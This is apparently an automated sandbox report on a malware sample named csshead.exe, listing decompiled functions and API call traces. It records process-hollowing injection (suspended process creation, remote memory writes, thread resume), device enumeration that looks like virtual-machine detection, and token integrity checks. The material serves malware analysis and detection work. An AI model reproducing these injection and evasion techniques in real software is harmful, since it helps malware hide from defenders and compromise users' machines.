0x004051a0
0x004051a0
0x004051a0
0x004051a0
0x00000000
0x0040518c

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00405040
CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0040508F
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 004050F5
MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000), ref: 0040510D

Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD

Part of subcall function 00404EF0: ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F3A
Part of subcall function 00404EF0: ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F69
Part of subcall function 00404EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 00404FBC
Part of subcall function 00404EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 00404FED

GetThreadContext.KERNEL32(?,00010007), ref: 00405209
CloseHandle.KERNEL32(?), ref: 004052C8

Part of subcall function 00404DE0: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 00404E09
Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E39
Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E5A
Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E7E

VirtualProtectEx.KERNELBASE(?,00000000,0000029B,00000040,?), ref: 00405252
WriteProcessMemory.KERNELBASE(?,00000000,?,0000029B,?), ref: 0040526C

Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A

ResumeThread.KERNELBASE(?), ref: 0040527E
WaitForSingleObject.KERNEL32(?,00000000), ref: 00405292
GetExitCodeProcess.KERNEL32(?,?), ref: 004052A4
CloseHandle.KERNEL32(?), ref: 004052BE

Strings

D, xrefs: 0040506E
_section, xrefs: 004050B3

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00406ECE, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00406ECE(signed char __eax, void* __ecx, void* __edx, void* __esi, char _a1) {
				intOrPtr _v4;
				void* _v8;
				void* _v12;
				struct HINSTANCE__* _v16;
				signed int _v20;
				void* _v28;
				CHAR* _v36;
				void* _v157;
				void* _v188;
				char* __ebp;
				void* _t115;

				_t115 = __ecx;
				_t57 = __eax;
				if(__esi + 1 <= 0) {
					L7:
					__eflags =  *(_t115 - 0x45ffffff) & _t57;
				} else {
					if(__eflags <= 0) {
						asm("lock lea eax, [ebp-0x209]");
						if(E00401110(__eax, _v16) != 0) {
							_v4 = 0xffffffff;
						}
						E00401440(_v16);
						return _v4;
					} else {
						asm("rol esi, 1");
						asm("sahf");
						asm("out 0x48, al");
						asm("salc");
						asm("sbb [eax], eax");
						__eax->i = __eax->i + __al;
						__dh = __dh + __al;
						asm("repne shl dl, 0x4a");
						__ebp =  &_a1;
						_push(es);
						asm("rol byte [fs:eax], 0x0");
						_push( &_a1);
						__ebp = __esp;
						__esp = __esp + 0xffffff44;
						__eax = 0;
						_v16 = 0;
						__eax =  *0x40a55c; // 0x406ed0
						_v36 = __eax;
						__eax = _v36;
						__eax = LoadLibraryA(_v36); // executed
						_v20 = __eax;
						__eax = _v36;
						__eax = E00401440(_v36);
						__eflags = _v20;
						if (_v20 == 0) goto L13;
						goto L7;
					}
				}
			}

0x00406ece
0x00406ece
0x00406ed1
0x00406f21
0x00406f21
0x00406ed3
0x00406ed3
0x00406ea5
0x00406eb6
0x00406eb8
0x00406eb8
0x00406ec2
0x00406ecd
0x00406ed5
0x00406ed5
0x00406ed7
0x00406ed8
0x00406eda
0x00406edb
0x00406edd
0x00406edf
0x00406ee1
0x00406ee6
0x00406ee7
0x00406ee8
0x00406eec
0x00406eed
0x00406eef
0x00406ef5
0x00406ef7
0x00406efa
0x00406f04
0x00406f07
0x00406f0b
0x00406f11
0x00406f14
0x00406f17
0x00406f1c
0x00406f20
0x00000000
0x00406f20
0x00406ed3

APIs

Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454

LoadLibraryA.KERNELBASE(?), ref: 00406F0B
SetupDiGetClassDevsA.SETUPAPI(0040A014,00000000,00000000,00000002), ref: 00406F79
SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00406FA7
SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000000,?,00000000,00000081,?), ref: 00406FCE
CharLowerBuffA.USER32(00000000,00000000), ref: 00406FE7
SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 00406FF1
SetupDiGetClassDevsA.SETUPAPI(0040A024,00000000,00000000,00000002), ref: 00407028
SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00407056
SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,0000000C,?,00000000,00000081,?), ref: 0040707D
CharLowerBuffA.USER32(00000000,00000000), ref: 00407096
SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 004070A0

Strings

n@, xrefs: 00406FF7

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00424C01, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 98

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32(?,0043CD78,00000058), ref: 00424C11
HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 00424C26

Part of subcall function 0042769E: HeapCreate.KERNELBASE(00000000,00001000,00000000,00424C7A), ref: 004276A7

Part of subcall function 004260A2: GetModuleHandleW.KERNEL32(00436FF4,?,00424C8B), ref: 004260AA
Part of subcall function 004260A2: TlsAlloc.KERNEL32(?,00424C8B), ref: 00426143
Part of subcall function 004260A2: RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426179
Part of subcall function 004260A2: RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426186
Part of subcall function 004260A2: RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426193
Part of subcall function 004260A2: RtlEncodePointer.NTDLL(?,00424C8B), ref: 004261A0
Part of subcall function 004260A2: RtlDecodePointer.NTDLL(Function_00015F05,?,00424C8B), ref: 004261C1
Part of subcall function 004260A2: RtlDecodePointer.NTDLL(00000000,?,00424C8B), ref: 004261F0
Part of subcall function 004260A2: GetCurrentThreadId.KERNEL32 ref: 00426202

__RTC_Initialize.LIBCMT ref: 00424C97

Part of subcall function 0042CE7D: GetStartupInfoW.KERNEL32(?), ref: 0042CE8A
Part of subcall function 0042CE7D: GetFileType.KERNEL32(?), ref: 0042CFBD
Part of subcall function 0042CE7D: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042CFF3
Part of subcall function 0042CE7D: GetStdHandle.KERNEL32(-000000F6), ref: 0042D047
Part of subcall function 0042CE7D: GetFileType.KERNEL32(00000000), ref: 0042D059
Part of subcall function 0042CE7D: InitializeCriticalSectionAndSpinCount.KERNEL32(-00443954,00000FA0), ref: 0042D087
Part of subcall function 0042CE7D: SetHandleCount.KERNEL32 ref: 0042D0B0

__amsg_exit.LIBCMT ref: 00424CAA
GetCommandLineA.KERNEL32 ref: 00424CB0

Part of subcall function 0042CDE6: GetEnvironmentStringsW.KERNEL32 ref: 0042CDF0
Part of subcall function 0042CDE6: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE64
Part of subcall function 0042CDE6: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE70

Part of subcall function 0042CD2B: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\csshead.exe,00000104), ref: 0042CD57
Part of subcall function 0042CD2B: _parse_cmdline.LIBCMT ref: 0042CD82
Part of subcall function 0042CD2B: _parse_cmdline.LIBCMT ref: 0042CDC3

__amsg_exit.LIBCMT ref: 00424CD0

Part of subcall function 0042CAB5: _strlen.LIBCMT ref: 0042CADF
Part of subcall function 0042CAB5: _strlen.LIBCMT ref: 0042CB10

__amsg_exit.LIBCMT ref: 00424CE1

Part of subcall function 00424443: __initterm_e.LIBCMT ref: 00424479

__amsg_exit.LIBCMT ref: 00424CF4

Part of subcall function 00419D20: CoInitialize.OLE32(00000000), ref: 00419D2C
Part of subcall function 00419D20: NtdllDefWindowProc_A.NTDLL(00000000,00000000,00000000,00000000), ref: 00419D3A
Part of subcall function 00419D20: GetCommandLineA.KERNEL32 ref: 00419DA4
Part of subcall function 00419D20: CreateMenu.USER32 ref: 00419EAE
Part of subcall function 00419D20: LoadBitmapA.USER32(?,00433E0C), ref: 00419EDC
Part of subcall function 00419D20: AppendMenuA.USER32(00000000,00000014,?,00000000), ref: 00419EEC
Part of subcall function 00419D20: BeginDeferWindowPos.USER32(00442A98), ref: 00419F07
Part of subcall function 00419D20: CreateMetaFileA.GDI32(?), ref: 00419F2B
Part of subcall function 00419D20: SetBrushOrgEx.GDI32(00000000,00000001,00000000,00000000), ref: 00419F3A
Part of subcall function 00419D20: LoadImageA.USER32(?,?,00000001,00000010,00000010,00000000), ref: 00419F6A
Part of subcall function 00419D20: FtpPutFileEx.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0041A00D
Part of subcall function 00419D20: GetSysColorBrush.USER32(0000000F), ref: 0041A084
Part of subcall function 00419D20: FrameRect.USER32(00000000,?,00000000), ref: 0041A094
Part of subcall function 00419D20: GlobalAlloc.KERNELBASE(00001000,00000838), ref: 0041A0C0
Part of subcall function 00419D20: GetLastError.KERNEL32 ref: 0041A101
Part of subcall function 00419D20: GetIconInfo.USER32(00000000,?), ref: 0041A12D
Part of subcall function 00419D20: GetIconInfo.USER32(00000000,?), ref: 0041A14D

Strings

MZP, xrefs: 00424C31, 00424D11

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 004260A2, Relevance: 13.6, APIs: 9, Instructions: 109
thread

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00436FF4,?,00424C8B), ref: 004260AA
TlsAlloc.KERNEL32(?,00424C8B), ref: 00426143
RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426179
RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426186
RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426193
RtlEncodePointer.NTDLL(?,00424C8B), ref: 004261A0

Part of subcall function 0042BF11: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 0042BF39

RtlDecodePointer.NTDLL(Function_00015F05,?,00424C8B), ref: 004261C1

Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C

RtlDecodePointer.NTDLL(00000000,?,00424C8B), ref: 004261F0

Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(00436FF4,0043CE18,00000008,00425EC6,00000000,00000000,?,?,00417F96,00000009), ref: 00425DCF
Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10

GetCurrentThreadId.KERNEL32 ref: 00426202

Part of subcall function 00425D81: RtlDecodePointer.NTDLL(0044204C), ref: 00425D92
Part of subcall function 00425D81: TlsFree.KERNEL32(00442050,00426218,?,00424C8B), ref: 00425DAC

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00424C01, Relevance: 12.1, APIs: 8, Instructions: 98

C-Code - Quality: 56%

			E00424C01(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t22;
				void* _t26;
				intOrPtr _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				void* _t47;
				signed int _t48;
				void* _t51;
				void* _t55;
				void* _t58;
				void* _t67;

				_t67 = __fp0;
				_t52 = __edi;
				_t51 = __edx;
				_t45 = __ebx;
				_push(0x58);
				_push(0x43cd78);
				L00429EF0(__ebx, __edi, __esi);
				GetStartupInfoW(_t55 - 0x68);
				if( *0x444a94 == 0) {
					 *0x4331a0(0, 1, 0, 0);
				}
				_t58 =  *0x400000 - 0x5a4d; // 0x5a4d
				if(_t58 == 0) {
					_t22 =  *0x40003c; // 0xe8
					__eflags =  *((intOrPtr*)(_t22 + 0x400000)) - 0x4550;
					if( *((intOrPtr*)(_t22 + 0x400000)) != 0x4550) {
						goto L3;
					} else {
						_t46 = 0x10b;
						__eflags =  *((intOrPtr*)(_t22 + 0x400018)) - 0x10b;
						if( *((intOrPtr*)(_t22 + 0x400018)) != 0x10b) {
							goto L3;
						} else {
							__eflags =  *((intOrPtr*)(_t22 + 0x400074)) - 0xe;
							if( *((intOrPtr*)(_t22 + 0x400074)) <= 0xe) {
								goto L3;
							} else {
								__eflags =  *(_t22 + 0x4000e8);
								_t8 =  *(_t22 + 0x4000e8) != 0;
								__eflags = _t8;
								_t46 = 0 | _t8;
								 *(_t55 - 0x1c) = _t8;
							}
						}
					}
				} else {
					L3:
					 *(_t55 - 0x1c) = 0;
				}
				if(E0042769E() == 0) {
					E00424BD8(0x1c);
					_pop(_t46);
				}
				if(E004260A2(_t45, _t67) == 0) {
					E00424BD8(0x10);
					_pop(_t46);
				}
				L0042C2D2();
				 *((intOrPtr*)(_t55 - 4)) = 0;
				_t26 = L0042CE7D();
				_t61 = _t26;
				if(_t26 < 0) {
					L00424664(_t51, _t61, _t67);
					_t46 = 0x1b;
				}
				 *0x444a90 = GetCommandLineA(); // executed
				_t28 = E0042CDE6(); // executed
				 *0x442c34 = _t28;
				_t29 = L0042CD2B(_t46);
				_t62 = _t29;
				if(_t29 < 0) {
					L00424664(_t51, _t62, _t67);
					_t46 = 8;
				}
				_t30 = E0042CAB5(_t46, _t51, _t52);
				_t63 = _t30;
				if(_t30 < 0) {
					_push(9);
					L00424664(_t51, _t63, _t67);
				}
				_t31 = E00424443(_t52, 0, 1); // executed
				_pop(_t47);
				_t64 = _t31;
				if(_t31 != 0) {
					L00424664(_t51, _t64, _t67);
					_t47 = _t31;
				}
				_t32 = L0042CA56(_t47);
				_t65 =  *(_t55 - 0x3c) & 0x00000001;
				if(( *(_t55 - 0x3c) & 0x00000001) == 0) {
					_t48 = 0xa;
				} else {
					_t48 =  *(_t55 - 0x38) & 0x0000ffff;
				}
				_push(_t48);
				_push(_t32);
				_push(0);
				_push(0x400000);
				 *((intOrPtr*)(_t55 - 0x20)) = L00419D20(_t45, _t52, _t65, _t67);
				if( *(_t55 - 0x1c) == 0) {
					L0042461A(_t33);
				}
				L00424646();
				 *((intOrPtr*)(_t55 - 4)) = 0xfffffffe;
				return L00429F35( *((intOrPtr*)(_t55 - 0x20)));
			}

0x00424c01
0x00424c01
0x00424c01
0x00424c01
0x00424c01
0x00424c03
0x00424c08
0x00424c11
0x00424c1f
0x00424c26
0x00424c26
0x00424c31
0x00424c38
0x00424c3f
0x00424c44
0x00424c4e
0x00000000
0x00424c50
0x00424c50
0x00424c55
0x00424c5c
0x00000000
0x00424c5e
0x00424c5e
0x00424c65
0x00000000
0x00424c67
0x00424c69
0x00424c6f
0x00424c6f
0x00424c6f
0x00424c72
0x00424c72
0x00424c65
0x00424c5c
0x00424c3a
0x00424c3a
0x00424c3a
0x00424c3a
0x00424c7c
0x00424c80
0x00424c85
0x00424c85
0x00424c8d
0x00424c91
0x00424c96
0x00424c96
0x00424c97
0x00424c9c
0x00424c9f
0x00424ca4
0x00424ca6
0x00424caa
0x00424caf
0x00424caf
0x00424cb6
0x00424cbb
0x00424cc0
0x00424cc5
0x00424cca
0x00424ccc
0x00424cd0
0x00424cd5
0x00424cd5
0x00424cd6
0x00424cdb
0x00424cdd
0x00424cdf
0x00424ce1
0x00424ce6
0x00424ce9
0x00424cee
0x00424cef
0x00424cf1
0x00424cf4
0x00424cf9
0x00424cf9
0x00424cfa
0x00424cff
0x00424d03
0x00424d0d
0x00424d05
0x00424d05
0x00424d05
0x00424d0e
0x00424d0f
0x00424d10
0x00424d11
0x00424d1b
0x00424d21
0x00424d24
0x00424d24
0x00424d29
0x00424d5e
0x00424d6d

APIs

GetStartupInfoW.KERNEL32(?,0043CD78,00000058), ref: 00424C11
HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 00424C26

Part of subcall function 0042769E: HeapCreate.KERNELBASE(00000000,00001000,00000000,00424C7A), ref: 004276A7

Part of subcall function 004260A2: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00424C8B), ref: 004260AA
Part of subcall function 004260A2: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004260CC
Part of subcall function 004260A2: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004260D9
Part of subcall function 004260A2: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004260E6
Part of subcall function 004260A2: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004260F3
Part of subcall function 004260A2: TlsAlloc.KERNEL32(?,00424C8B), ref: 00426143
Part of subcall function 004260A2: TlsSetValue.KERNEL32(00000000,?,00424C8B), ref: 0042615E
Part of subcall function 004260A2: RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426179
Part of subcall function 004260A2: RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426186
Part of subcall function 004260A2: RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426193
Part of subcall function 004260A2: RtlEncodePointer.NTDLL(?,00424C8B), ref: 004261A0
Part of subcall function 004260A2: RtlDecodePointer.NTDLL(Function_00025F05,?,00424C8B), ref: 004261C1
Part of subcall function 004260A2: RtlDecodePointer.NTDLL(00000000,?,00424C8B), ref: 004261F0
Part of subcall function 004260A2: GetCurrentThreadId.KERNEL32 ref: 00426202

__RTC_Initialize.LIBCMT ref: 00424C97

Part of subcall function 0042CE7D: GetStartupInfoW.KERNEL32(?), ref: 0042CE8A
Part of subcall function 0042CE7D: GetFileType.KERNEL32(?), ref: 0042CFBD
Part of subcall function 0042CE7D: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042CFF3
Part of subcall function 0042CE7D: GetStdHandle.KERNEL32(-000000F6), ref: 0042D047
Part of subcall function 0042CE7D: GetFileType.KERNEL32(00000000), ref: 0042D059
Part of subcall function 0042CE7D: InitializeCriticalSectionAndSpinCount.KERNEL32(-00443954,00000FA0), ref: 0042D087
Part of subcall function 0042CE7D: SetHandleCount.KERNEL32 ref: 0042D0B0

__amsg_exit.LIBCMT ref: 00424CAA
GetCommandLineA.KERNEL32 ref: 00424CB0

Part of subcall function 0042CDE6: GetEnvironmentStringsW.KERNEL32 ref: 0042CDF0
Part of subcall function 0042CDE6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0042CE2E
Part of subcall function 0042CDE6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0042CE51
Part of subcall function 0042CDE6: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE64
Part of subcall function 0042CDE6: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE70

Part of subcall function 0042CD2B: GetModuleFileNameA.KERNEL32(00000000,004434C0,00000104), ref: 0042CD57
Part of subcall function 0042CD2B: _parse_cmdline.LIBCMT ref: 0042CD82
Part of subcall function 0042CD2B: _parse_cmdline.LIBCMT ref: 0042CDC3

__amsg_exit.LIBCMT ref: 00424CD0

Part of subcall function 0042CAB5: _strlen.LIBCMT ref: 0042CADF
Part of subcall function 0042CAB5: _strlen.LIBCMT ref: 0042CB10

__amsg_exit.LIBCMT ref: 00424CE1

Part of subcall function 00424443: __initterm_e.LIBCMT ref: 00424479

__amsg_exit.LIBCMT ref: 00424CF4

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 004042D4, Relevance: 10.6, APIs: 7, Instructions: 101

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E004042D4(void* __eax) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				void** _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr* _v40;
				signed int _t40;
				signed int _t47;
				signed int _t59;

				_v8 = __eax;
				_v16 = 0;
				_t40 = OpenProcessToken(_v8, 8,  &_v20);
				asm("sbb eax, eax");
				if( ~( ~_t40) == 0) {
					L17:
					_v12 = _v16;
					return _v12;
				}
				_t47 = GetTokenInformation(_v20, 0x19, 0, 0,  &_v24); // executed
				asm("sbb eax, eax");
				if( ~( ~_t47) != 0 || GetLastError() != 0x7a) {
					L16:
					CloseHandle(_v20);
					goto L17;
				} else {
					_v28 = E004013DC(_v24);
					if(_v28 == 0) {
						goto L16;
					}
					_t59 = GetTokenInformation(_v20, 0x19, _v28, _v24,  &_v24); // executed
					asm("sbb eax, eax");
					if( ~( ~_t59) != 0) {
						_v36 = GetSidSubAuthorityCount( *_v28);
						if(_v36 != 0 &&  *_v36 > 0) {
							_v40 = GetSidSubAuthority( *_v28, ( *_v36 & 0x000000ff) - 1);
							if(_v40 != 0) {
								_v32 =  *_v40;
								if(_v32 >= 0x2000) {
									if(_v32 < 0x2000 || _v32 >= 0x3000) {
										if(_v32 >= 0x3000) {
											_v16 = 3;
										}
									} else {
										_v16 = 2;
									}
								} else {
									_v16 = 1;
								}
							}
						}
					}
					E00401440(_v28);
					goto L16;
				}
			}

0x004042da
0x004042df
0x004042ec
0x004042f4
0x004042fa
0x004043f9
0x004043fc
0x00404405
0x00404405
0x0040430e
0x00404316
0x0040431c
0x004043ef
0x004043f3
0x00000000
0x00404331
0x00404339
0x00404340
0x00000000
0x00000000
0x00404358
0x00404360
0x00404366
0x00404374
0x0040437b
0x00404399
0x004043a0
0x004043a7
0x004043b1
0x004043c3
0x004043de
0x004043e0
0x004043e0
0x004043ce
0x004043ce
0x004043ce
0x004043b3
0x004043b3
0x004043b3
0x004043b1
0x004043a0
0x0040437b
0x004043ea
0x00000000
0x004043ea

APIs

OpenProcessToken.ADVAPI32(?,00000008,?), ref: 004042EC
GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0040430E
GetLastError.KERNEL32 ref: 00404322

Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2

GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00404358
GetSidSubAuthorityCount.ADVAPI32(?), ref: 0040436E
GetSidSubAuthority.ADVAPI32(?,?), ref: 00404393

Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454

CloseHandle.KERNEL32(?), ref: 004043F3

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00424890, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74

Control-flow Graph

Executed
Not Executed

APIs

RtlDecodePointer.NTDLL(00442BF0,@G@,00000000,?,?,00424994,00000000,0043CD58,0000000C,004249C0,00000000,?,00423975,00432EB5,00000000), ref: 004248A5
RtlDecodePointer.NTDLL(?,?,00424994,00000000,0043CD58,0000000C,004249C0,00000000,?,00423975,00432EB5,00000000), ref: 004248B2

Part of subcall function 004252AE: RtlSizeHeap.NTDLL(00000000,00000000), ref: 004252D9

Part of subcall function 0042A170: Sleep.KERNEL32(00000000,00000000,00000000,?,0042490A,00000000,00000010,?,?,00424994,00000000,0043CD58,0000000C,004249C0,00000000), ref: 0042A19A

RtlEncodePointer.NTDLL(00000000), ref: 00424917
RtlEncodePointer.NTDLL(00000000,?,?,00424994,00000000,0043CD58,0000000C,004249C0,00000000,?,00423975,00432EB5,00000000), ref: 0042492B
RtlEncodePointer.NTDLL(-00000004,?,?,00424994,00000000,0043CD58,0000000C,004249C0,00000000,?,00423975,00432EB5,00000000), ref: 00424933

Strings

@G@, xrefs: 00424897

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00424890, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74

C-Code - Quality: 21%

			E00424890(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t11;
				intOrPtr* _t12;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t19;
				void* _t22;
				void* _t24;
				intOrPtr _t25;
				void* _t27;
				void* _t28;
				void* _t34;
				signed int _t37;
				intOrPtr* _t38;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t42;

				_t41 =  *0x4331bc;
				_t11 =  *_t41( *0x444aa0, _t34, _t40, _t24, _t28); // executed
				_t25 = _t11;
				_v8 = _t25;
				_t12 =  *_t41( *0x444a9c); // executed
				_t42 = _t12;
				if(_t42 < _t25) {
					L11:
					_t13 = 0;
				} else {
					_t37 = _t42 - _t25;
					_t2 = _t37 + 4; // 0x4
					if(_t2 < 4) {
						goto L11;
					} else {
						_t27 = E004252AE(_t25);
						_t3 = _t37 + 4; // 0x4
						if(_t27 >= _t3) {
							L10:
							_t38 =  *0x4331b8; // executed
							_t17 =  *_t38(_a4); // executed
							 *_t42 = _t17;
							_t18 =  *_t38(_t42 + 4); // executed
							 *0x444a9c = _t18;
							_t13 = _a4;
						} else {
							_t19 = 0x800;
							if(_t27 < 0x800) {
								_t19 = _t27;
							}
							_t20 = _t19 + _t27;
							if(_t19 + _t27 < _t27) {
								L7:
								_t5 = _t27 + 0x10; // 0x10
								_t21 = _t5;
								if(_t5 < _t27) {
									goto L11;
								} else {
									_t22 = L0042A170(_v8, _t21);
									if(_t22 == 0) {
										goto L11;
									} else {
										goto L9;
									}
								}
							} else {
								_t22 = L0042A170(_v8, _t20);
								if(_t22 != 0) {
									L9:
									_t42 = _t22 + (_t37 >> 2) * 4;
									 *0x444aa0 =  *0x4331b8(_t22);
									goto L10;
								} else {
									goto L7;
								}
							}
						}
					}
				}
				return _t13;
			}

0x00424898
0x004248a5
0x004248ad
0x004248af
0x004248b2
0x004248b4
0x004248b8
0x0042493f
0x0042493f
0x004248be
0x004248c0
0x004248c2
0x004248c8
0x00000000
0x004248ca
0x004248d0
0x004248d2
0x004248d8
0x00424922
0x00424925
0x0042492b
0x0042492d
0x00424933
0x00424935
0x0042493a
0x004248da
0x004248da
0x004248e1
0x004248e3
0x004248e3
0x004248e5
0x004248e9
0x004248fa
0x004248fa
0x004248fa
0x004248ff
0x00000000
0x00424901
0x00424905
0x0042490e
0x00000000
0x00000000
0x00000000
0x00000000
0x0042490e
0x004248eb
0x004248ef
0x004248f8
0x00424910
0x00424914
0x0042491d
0x00000000
0x00000000
0x00000000
0x00000000
0x004248f8
0x004248e9
0x004248d8
0x004248c8
0x00424945

APIs

RtlDecodePointer.NTDLL(00442BF0,@G@,?,?,?,00424994,?,0043CD58,0000000C,004249C0,?,?,00423975,00432EB5,?), ref: 004248A5
RtlDecodePointer.NTDLL(?,?,00424994,?,0043CD58,0000000C,004249C0,?,?,00423975,00432EB5,?), ref: 004248B2

Part of subcall function 004252AE: HeapSize.KERNEL32(00000000,00000000,?,004248D0,00000000,?,?,00424994,?,0043CD58,0000000C,004249C0,?,?,00423975,00432EB5), ref: 004252D9

Part of subcall function 0042A170: Sleep.KERNEL32(00000000,00000000,00000000,?,0042490A,00000000,00000010,?,?,00424994,?,0043CD58,0000000C,004249C0,?), ref: 0042A19A

EncodePointer.KERNEL32(00000000,?,?,00424994,?,0043CD58,0000000C,004249C0,?,?,00423975,00432EB5,?), ref: 00424917
